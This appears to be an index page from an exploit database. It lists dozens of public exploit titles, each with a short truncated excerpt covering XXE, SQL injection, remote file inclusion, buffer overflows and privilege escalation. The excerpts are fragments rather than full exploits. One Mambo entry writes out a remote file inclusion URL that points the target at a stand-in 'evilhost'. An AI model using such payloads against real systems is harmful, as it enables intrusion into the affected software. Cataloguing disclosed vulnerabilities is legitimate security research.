Ahsay Backup 7.x - 8.1.1.50 - XML External Entity Injection

Ahsay Backup 7.x - 8.1.1.50 - XML External Entity Injection Unauthenticated XML External Entity XXE in Ahsay Backup v7.x - v8.1.0.50. Date: 26-6-2019 Exploit Author: Wietse Boonstra Vendor Homepage: https://ahsay.com Software Link: http://ahsay-dn.ahsay.com/v8/81050/cbs-win.exe Version: 7.x...

Huawei eSpace 1.1.11.103 - ContactsCtrl.dll eSpaceStatusCtrl.dll ActiveX Heap Overflow

Huawei eSpace 1.1.11.103 - ContactsCtrl.dll eSpaceStatusCtrl.dll ActiveX Heap Overflow Huawei eSpace Meeting ContactsCtrl.dll and eSpaceStatusCtrl.dll ActiveX Heap Overflow Vendor: Huawei Technologies Co., Ltd. Product web page: https://www.huawei.com Affected version: eSpace 1.1.11.103 aka eSpac...

jQuery-File-Upload 9.22.0 - Arbitrary File Upload

jQuery-File-Upload 9.22.0 - Arbitrary File Upload Title: jQuery-File-Upload 9.22.0 - Arbitrary File Upload Author: Larry W. Cashdollar, @larry0 Date: 2018-10-09 Vendor: https://github.com/blueimp Download Site: https://github.com/blueimp/jQuery-File-Upload/releases CVE-ID: N/A Vulnerability: The...

Softros Network Time System Server 2.3.4 - Denial of Service

Softros Network Time System Server 2.3.4 - Denial of Service + Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/SOFTROS-NETWORK-TIME-SYSTEM-SERVER-v2.3.4-DENIAL-OF-SERVICE.txt + ISR: Apparition Security Vendor: =============...

GraphicsMagick - Memory Disclosure Heap Overflow

GraphicsMagick - Memory Disclosure Heap Overflow '''Vulnerabilities summary The following advisory describes two 2 vulnerabilities found in GraphicsMagick. GraphicsMagick is “The swiss army knife of image processing. Comprised of 267K physical lines according to David A. Wheeler’s SLOCCount of...

Vanilla Forums 2.3 - Remote Code Execution

Vanilla Forums 2.3 - Remote Code Execution !/bin/bash / / / / / / / / / / / / / / / / / / // / / / /// / / / / // / // / // / / / / // / // , / / / ///, /,// // //,///||// // // Vanilla Forums = 2.3 Remote Code Execution RCE PoC Exploit 0day Core version no plugins, default config...

Microsoft Windows Kernel - win32k.sys NtSetWindowLongPtr Local Privilege Escalation (MS16-135) (2)

Microsoft Windows Kernel - win32k.sys NtSetWindowLongPtr Local Privilege Escalation MS16-135 2 / Source: https://ricklarabee.blogspot.com/2017/01/virtual-memory-page-tables-and-one-bit.html Binary:...

sudo 1.8.0 1.8.3p1 - sudo_debug glibc FORTIFY_SOURCE Bypass + Privilege Escalation

sudo 1.8.0 1.8.3p1 - sudodebug glibc FORTIFYSOURCE Bypass + Privilege Escalation / death-star.c sudo v1.8.0-1.8.3p1 sudodebug format string root exploit + glibc FORTIFYSOURCE bypass by aeon - http://infosecabsurdity.wordpress.com/ This PoC exploits: - CVE-2012-0864 - FORTIFYSOURCE format string...

Advaced-Clan-Script 3.4 - mcf.php Remote File Inclusion

Advaced-Clan-Script 3.4 - mcf.php Remote File Inclusion .. | /| | \ / // | | | \ / // | | Y \ //\ \ | || / / / / discovered by xdh Critical Level: Dangerous Class: Remote File Inclusion Venedor site: http://avc.x.philipwette.de/ Version: AdVancedClanscript 3.4 VUln: Filename: mcf.php Line:...

PHPCOIN 1.2.3 - session_set.php Remote File Inclusion

PHPCOIN 1.2.3 - sessionset.php Remote File Inclusion phpCOIN 1.2.3 CCFGPKGPATHINCL Remote Include Vulnerability Discovered by: Timq http://www.securitydb.org Email: timqathackernetworkdotcom http://www.securitydb.org Vulnerable: requireonce include $CCFG'PKGPATHINCL'.'redirect.php'; Exploit PoC:...

DUportal Pro 3.4 - cat.asp Multiple SQL Injections

DUportal Pro 3.4 - cat.asp Multiple SQL Injections source: https://www.securityfocus.com/bid/13285/info DUportal Pro is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. A successful exploit could...

VMWare Fusion - Local Privilege Escalation

VMWare Fusion - Local Privilege Escalation Local Privilege Escalation via VMWare Fusion Overview: A directory traversal vulnerability in VMware Fusion's SUID binaries can allow an attacker to run commands as the root user. Tested Versions: VMware Fusion 10.1.3 9472307 on macOS 10.13.6 VMware Fusi...

NoMachine 5.3.27 - Remote Code Execution

NoMachine 5.3.27 - Remote Code Execution + Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/NOMACHINE-TROJAN-FILE-REMOTE-CODE-EXECUTION.txt + ISR: ApparitionSec Greetz: Greetz: indoushka | Eduardo Vendor www.nomachine.com...

OpenBSD - at Stack Clash Local Privilege Escalation

OpenBSD - at Stack Clash Local Privilege Escalation / OpenBSDat.c for CVE-2017-1000373 Copyright c 2017 Qualys, Inc. slowsort adapted from lib/libc/stdlib/qsort.c: Copyright c 1992, 1993 The Regents of the University of California. All rights reserved. Redistribution and use in source and binary...

PHP 5.5.375.6.237.0.8 - bzread() Out-of-Bounds Write

PHP 5.5.375.6.237.0.8 - bzread Out-of-Bounds Write ''' PHP 7.0.8, 5.6.23 and 5.5.37 does not perform adequate error handling in its bzread' function: php-7.0.8/ext/bz2/bz2.c ,---- | 364 static PHPFUNCTIONbzread | 365 | ... | 382 ZSTRLENdata = phpstreamreadstream, ZSTRVALdata, ZSTRLENdata; | 383...

Wildfly - WEB-INF META-INF Information Disclosure via Filter Restriction Bypass

Wildfly - WEB-INF META-INF Information Disclosure via Filter Restriction Bypass Exploit Title: Wildfly: WEB-INF and META-INF Information Disclosure via Filter Restriction Bypass Date: 09.02.16 Exploit Author: Tal Solomon of Palantir Security Vendor Homepage:...

Exim 4.86.2 - Local Privilege Escalation

Exim 4.86.2 - Local Privilege Escalation ============================================= - Advisory release date: 10.03.2016 - Created by: Dawid Golunski - Severity: High/Critical ============================================= I. VULNERABILITY ------------------------- Exim 4.86.2 Local Root Privile...

Linux Kernel 3.10.0 (CentOS RHEL 7.1) - visor clie_5_attach Nullpointer Dereference

Linux Kernel 3.10.0 CentOS RHEL 7.1 - visor clie5attach Nullpointer Dereference OS-S Security Advisory 2016-09 Linux visor clie5attach Nullpointer Dereference Date: March 4th, 2016 Authors: Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg CVE: CVE-2015-7566 CVSS: 4.9 AV:L/AC:L/Au:N/C:N/I:N/A:C...

Apache Commons FileUpload and Apache Tomcat - Denial of Service

Apache Commons FileUpload and Apache Tomcat - Denial of Service CVE-2014-0050 Apache Commons FileUpload and Apache Tomcat Denial-of-Service Author: Oren Hafif, Trustwave SpiderLabs Research This is a Proof of Concept code that was created for the sole purpose of assisting system administrators in...

Freefloat FTP Server - PUT Remote Buffer Overflow

Freefloat FTP Server - PUT Remote Buffer Overflow !/usr/bin/python TitleFreefloat FTP Server PUT Command Buffer Overflow Discovered and Reported22nd of September, 2012 Discovered/Exploited ByJacob Holcomb/Gimppy042 Software Vendorhttp://www.freefloat.com/ CVE for PUT OverflowCVE-2012-5106...

groones Guestbook 2.0 - Remote File Inclusion

groones Guestbook 2.0 - Remote File Inclusion GBOOK v2.0 Remote File Include Vulnerability http://www.groonesworld.com/programs/gbook/gbook.zip ======================================================== Author: k3vin mitnick tunisianblackhat team = = Home : http://tunisianblackhat.com &...

Microsoft Windows - GDI+ .ICO File Remote Denial of Service

Microsoft Windows - GDI+ .ICO File Remote Denial of Service Author : kad Mail : kadathighsecudotcom Site : http://www.highsecu.com highsecu.ico - Microsoft GDI+ Integer division by zero flaw handling .ICO files...

Mambo Component perForms 1.0 - Remote File Inclusion

Mambo Component perForms 1.0 - Remote File Inclusion ------------------------------------------------------------------------ --- perForms founds 12.000 sites ! http://www.vuln.com/components/comperforms/performs.php?mosConfigabsolutepath=http://evilhost Fix Add before code: defined'VALIDMOS' or...

Easy Message Board - Directory Traversal

Easy Message Board - Directory Traversal source: https://www.securityfocus.com/bid/13551/info Easy Message Board is prone to a directory traversal vulnerability that could allow attackers to read files outside the Web root...

Spidermonkey - IonMonkey Leaks JS_OPTIMIZED_OUT Magic Value to Script

Spidermonkey - IonMonkey Leaks JSOPTIMIZEDOUT Magic Value to Script IonMonkey can, during a bailout, leak an internal JSOPTIMIZEDOUT magic value to the running script. This magic value can then be used to achieve memory corruption. Prerequisites Magic Values Spidermonkey represents JavaScript...

McAfee ePO 5.9.1 - Registered Executable Local Access Bypass

McAfee ePO 5.9.1 - Registered Executable Local Access Bypass Exploit Title: McAfee ePO 5.9.1 Registered Executable Local Access Bypass Date: 2019-03-07 Exploit Author: @leonjza Vendor Homepage: https://www.mcafee.com/ Software Link:...

Linux Kernel - The Huge Dirty Cow Overwriting The Huge Zero Page (1)

Linux Kernel - The Huge Dirty Cow Overwriting The Huge Zero Page 1 // EDB Note: Source https://medium.com/bindecy/huge-dirty-cow-cve-2017-1000405-110eca132de0 // EDB Note: Source https://github.com/bindecy/HugeDirtyCowPOC // Author Note: Before running, make sure to set transparent huge pages to...

Nuxeo 6.07.17.27.3 - Remote Code Execution (Metasploit)

Nuxeo 6.07.17.27.3 - Remote Code Execution Metasploit =begin Description Nuxeo Platform is a content management system for enterprises CMS. It embeds an Apache Tomcat server, and can be managed through a web interface. One of its features allows authenticated users to import files to the platform...

Linux Kernel 3.14.5 (CentOS 7 RHEL) - libfutex Local Privilege Escalation

Linux Kernel 3.14.5 CentOS 7 RHEL - libfutex Local Privilege Escalation / CVE-2014-3153 exploit for RHEL/CentOS 7.0.1406 By Kaiqu Chen [email protected] Based on libfutex and the expoilt for Android by GeoHot. Usage: $gcc exploit.c -o exploit -lpthread $./exploit / include include include include...

WeBid 1.0.2 - Persistent Cross-Site Scripting (via SQL Injection)

WeBid 1.0.2 - Persistent Cross-Site Scripting via SQL Injection Exploit Title: presistent XSS through SQLi WeBid 1.0.2 Google Dork: "powered by WeBid" Date: 15-06-2011 Author: Saif El-Sherei Software Link: http://sourceforge.net/projects/simpleauction/ Version: 1.0.2 Tested on: Firefox 4, XAMPP...

FAQ Management Script - catid SQL Injection

FAQ Management Script - catid SQL Injection || | | FAQ Management catid Remote SQL Injection Vulnerability | | |-------------------- Hussin X -------------------| | | Author: Hussin X | | Home : WwW.IQ-ty.CoM | | email: darkangelg85atYahooDoTcom | | | | | | | | script :...

AppXSvc 17763 - Arbitrary File Overwrite (DoS)

AppXSvc 17763 - Arbitrary File Overwrite DoS Exploit Title: AppXSvc 17763 - Arbitrary File Overwrite DoS Date: 2019-10-28 Exploit Author: Gabor Seljan Vendor Homepage: https://www.microsoft.com/ Version: 17763.1.amd64fre.rs5release.180914-1434 Tested on: Windows 10 Version 1809 for x64-based...

Microsoft Office - OLE Remote Code Execution

Microsoft Office - OLE Remote Code Execution Source: https://github.com/embedi/CVE-2017-11882 CVE-2017-11882: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ MITRE CVE-2017-11882: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882 Research:...

Ikraus Anti Virus 2.16.7 - Remote Code Execution

Ikraus Anti Virus 2.16.7 - Remote Code Execution Vulnerability summary The following advisory describes an remote code execution found in Ikraus Anti Virus version 2.16.7. KARUS anti.virus “secures your personal data and PC from all kinds of malware. Additionally, the Anti-SPAM module protects yo...

Shopizer 1.1.5 - Multiple Vulnerabilities

Shopizer 1.1.5 - Multiple Vulnerabilities -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SEC Consult Vulnerability Lab Security Advisory ======================================================================= title: Multiple critical vulnerabilities in Shopizer webshop product: Shopizer vulnerable...

PHP 5.3.8 - Hashtables Denial of Service

PHP 5.3.8 - Hashtables Denial of Service Exploit Title: CVE-2011-4885 PHP Hashtables Denial of Service Exploit Date: 1/1/12 Author: infodox Software Link: php.net Version: 5.3. Tested on: Linux CVE : CVE-2011-4885 Exploit Download -- http://infodox.co.cc/Downloads/phpdos.txt...

Linux Kernel 2.6.37 (RedHat Ubuntu 10.04) - Full-Nelson.c Local Privilege Escalation

Linux Kernel 2.6.37 RedHat Ubuntu 10.04 - Full-Nelson.c Local Privilege Escalation / Linux Kernel = 2.6.37 local privilege escalation by Dan Rosenberg @djrbliss on twitter Usage: gcc full-nelson.c -o full-nelson ./full-nelson This exploit leverages three vulnerabilities to get root, all of which...

toutvirtual virtualiq pro 3.2 - Multiple Vulnerabilities

toutvirtual virtualiq pro 3.2 - Multiple Vulnerabilities &redirectSecure Network - Security Research Advisory Vuln name: ToutVirtual VirtualIQ Pro Multiple Vulnerabilities Systems affected: ToutVirtual VirtualIQ Professional 3.2 build 7882 Systems not affected: -- Severity: High Local/Remote:...

phpRealty 0.02 - MGR Multiple Remote File Inclusions

phpRealty 0.02 - MGR Multiple Remote File Inclusions |-------------------------------------------------------------------------------| | | | phpRealty 0.02 MGR Remote File include | | | | Script : phpRealty | | Version : 0.02 | | Authord : QTRinux | | Contact : Qataro at hotmail dot com | | Vendo...

ProductCart 1.x2.x - advSearch_h.asp Multiple SQL Injections

ProductCart 1.x2.x - advSearchh.asp Multiple SQL Injections source: https://www.securityfocus.com/bid/9669/info EarlyImpact ProductCart is reportedly prone to multiple vulnerabilities. The specific issues include SQL injection, cross-site scripting and cryptographic weaknesses. These issues could...

Hospital Management System 4.0 - searchdata SQL Injection

Hospital Management System 4.0 - searchdata SQL Injection Exploit Title: Hospital Management System 4.0 - 'searchdata' SQL Injection Google Dork: N/A Date: 2020-01-02 Exploit Author: FULLSHADE Vendor Homepage: https://phpgurukul.com/ Software Link:...

ChaosPro 2.0 - Buffer Overflow (SEH)

ChaosPro 2.0 - Buffer Overflow SEH Exploit Title: ChaosPro 2.0 - Buffer Overflow SEH Date: 2019-10-27 Exploit Author: Chase Hatch SYANiDE Vendor Homepage: http://www.chaospro.de/ Software link: http://www.chaospro.de/cpro20.zip Version: 2.0 Tested on: Windows XP Pro OEM !/usr/bin/env python2 impo...

Apple macOS 10.13.5 - Local Privilege Escalation

Apple macOS 10.13.5 - Local Privilege Escalation import import import import import import import "offsets.h" //utils define ENFORCEa, label \ do \ if builtinexpect!a, 0 \ \ timedlog"! %s is false l.%d\n", a, LINE; \ goto label; \ \ while 0 // from...

Linux Kernel 3.16.39 (Debian 8 x64) - inotfiy Local Privilege Escalation

Linux Kernel 3.16.39 Debian 8 x64 - inotfiy Local Privilege Escalation / CVE-2017-7533 inotfiy linux kernel vulnerability. $ gcc -o exploit exploit.c -lpthread $./exploit Listening for events. Listening for events. alloclen : 50 longname="testdir/bbbb32103210321032100��1����" handleevents...

GNU Wget 1.18 - Arbitrary File Upload Remote Code Execution

GNU Wget 1.18 - Arbitrary File Upload Remote Code Execution ============================================= - Release date: 06.07.2016 - Discovered by: Dawid Golunski - Severity: High - CVE-2016-4971 ============================================= I. VULNERABILITY ------------------------- GNU Wget...

ImageMagick 7.0.1-0 6.9.3-9 - ImageTragick Multiple Vulnerabilities

ImageMagick 7.0.1-0 6.9.3-9 - ImageTragick Multiple Vulnerabilities Nikolay Ermishkin from the Mail.Ru Security Team discovered several vulnerabilities in ImageMagick. We've reported these issues to developers of ImageMagick and they made a fix for RCE in sources and released new version 6.9.3-9...

Wordpress Plugin Appointment Booking Calendar 1.3.34 - CSV Injection

Wordpress Plugin Appointment Booking Calendar 1.3.34 - CSV Injection Exploit Title: Wordpress Plugin Appointment Booking Calendar 1.3.34 - CSV Injection Google Dork: N/A Date: 2020-03-05 Exploit Author: Daniel Monzón stark0de Vendor Homepage: https://www.codepeople.net/ Software Link:...

FUDForum 3.0.9 - Remote Code Execution

FUDForum 3.0.9 - Remote Code Execution Exploit Title : FUDForum 3.0.9 - Remote Code Execution Date: 2019-10-26 Exploit Author: liquidsky JMcPeters Vulnerable Software: FUDForum 3.0.9 Vendor Homepage: https://sourceforge.net/projects/fudforum/ Version: 3.0.9 Software Link:...

microASP (Portal+) CMS - pagina.phtml?explode_tree SQL Injection

microASP Portal+ CMS - pagina.phtml?explodetree SQL Injection + Sql Injection on microASP Portal+ CMS + Date: 05/05/2019 + Risk: High + CWE Number : CWE-89 + Author: Felipe Andrian Peixoto + Vendor Homepage: http://www.microasp.it/ + Contact: [email protected] + Tested on: Windows 7 and...

ZyXEL VMG3312-B10B - Cross-Site Scripting

ZyXEL VMG3312-B10B - Cross-Site Scripting Exploit Title: ZyXEL VMG3312-B10B - Cross-Site Scripting Date: 2018-08-21 Exploit Author: Samet ŞAHİN Vendor Homepage: https://www.zyxel.com/ Software Link: ftp://ftp.zyxel.com.tr/ZyXELURUNLERI/MODEMLER/VDSLMODEMLER/VMG3312-B10B/ Version: ZyXEL VMG3312-B1...